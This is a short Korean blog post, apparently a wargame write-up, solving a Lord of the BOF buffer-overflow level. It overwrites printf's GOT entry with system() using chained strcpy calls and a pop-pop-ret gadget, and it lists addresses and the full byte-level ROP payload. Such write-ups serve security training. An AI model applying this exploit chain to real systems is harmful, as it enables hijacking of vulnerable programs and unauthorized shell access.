int $0x80

evil_wiard -> dark_stone 본문

워게임/Lord Of the BOF

evil_wiard -> dark_stone

cd80 cd80 2013.10.15 14:14

 

 

이번 문제도 저번문제처럼 .bss에 RTL 페이로드를 복사해 풀려 했으나

execve함수에서 자꾸 Bad Address에러가 나서 실패했습니다

원인에 대한 분석을 언제할진 모르겠지만 하게되면 블로그에 올리겠습니다

 

그래서 printf -> system 으로 got overwrite 해 풀었습니다

 

풀면서 노트한 내용입니다

 

0x8048408 printf@PLT
0x804984c printf@GOT
0x8048438 strcpy@PLT
0x80484f3 ppr

0x007507c0 system@LIBC
0x00833603 "/bin/sh"@LIBC

strcpy( 0x8049850, "0x007507c0" )


0x80482b4 0xc0 0x8049850 \x4c\x98\x04\x08\xd0\x84\x04\x08
0x8048364 0x07 0x8049851 \x4d\x98\x04\x08\x64\x83\x04\x08
0x80484d0 0x75 0x8049852 \x4e\x98\x04\x08\xb4\x82\x04\x08
0x804833c 0x00 0x8049853 \x4f\x98\x04\x08\x3c\x83\x04\x08

strcpy + ppr \x38\x84\x04\x08\xf3\x84\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x4c\x98\x04\x08\xd0\x84\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4d\x98\x04\x08\x64\x83\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4e\x98\x04\x08\xb4\x82\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4f\x98\x04\x08\x3c\x83\x04\x08

 

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10
0 Comments
댓글쓰기 폼